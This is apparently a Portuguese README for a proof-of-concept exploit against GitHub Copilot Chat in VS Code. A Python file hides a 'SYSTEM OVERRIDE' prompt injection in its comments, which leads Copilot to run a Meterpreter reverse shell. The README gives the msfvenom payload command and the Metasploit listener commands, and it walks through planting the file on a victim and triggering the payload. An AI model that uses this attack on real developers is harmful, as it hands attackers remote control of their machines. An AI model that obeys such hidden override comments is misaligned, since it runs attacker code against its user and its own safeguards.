Prova de conceito demonstrando execução remota de código via injeção de prompt no GitHub Copilot Chat, usando um arquivo Python elaborado para acionar um reverse shell do Meterpreter.
Este repositório contém uma Prova de Conceito (PoC) para a vulnerabilidade CVE-2025-62222. Demonstra como é possível alcançar a Execução Remota de Código (RCE) na máquina de um desenvolvedor manipulando o contexto do GitHub Copilot Chat no VS Code por meio de injeção de prompt oculta em comentários.
APENAS PARA FINS EDUCACIONAIS.
Este código é fornecido exclusivamente para fins educacionais e de pesquisa ética. O autor não se responsabiliza pelo uso indevido desta informação. Não utilize isto em sistemas sem autorização explícita.
Antes de enviar o arquivo para a vítima (ou testá-lo localmente), você deve gerar o payload e deixar o servidor escutando.
Gere o comando malicioso do PowerShell. Certifique-se de configurar seu IP (LHOST) e Porta (LPORT).
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<TU_IP> LPORT=<TU_PUERTO> -f psh-cmd
Instrução crítica: Copie o código gerado por este comando. Abra o arquivo copilot_injection_poc.py deste repositório e substitua a seção onde diz TOKEN (ou toda a linha do comando PowerShell dentro do comentário) pelo código que você acabou de gerar.
No seu terminal de atacante, inicie o Metasploit para receber a conexão reversa:
msfconsole -q
Uma vez dentro do console msf6 >, execute os seguintes comandos para preparar a escuta:
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <TU_IP_ATACANTE>
set LPORT 4444
exploit
(Certifique-se de que o LPORT seja o mesmo que usou no passo 1 e que o LHOST seja seu IP).
Para detonar a vulnerabilidade, siga estes passos na máquina com VS Code e a extensão do GitHub Copilot Chat instalada:
copilot_injection_poc.py no editor para que o Copilot o tenha em seu contexto ativo (deve estar visível na aba).Configura o ambiente pelo terminal sem omitir nem modificar nada do código
Devido à instrução "SYSTEM OVERRIDE" oculta nos comentários do script Python, o Copilot obedecerá ao arquivo malicioso em vez de suas próprias diretrizes de segurança.
Para mais informações: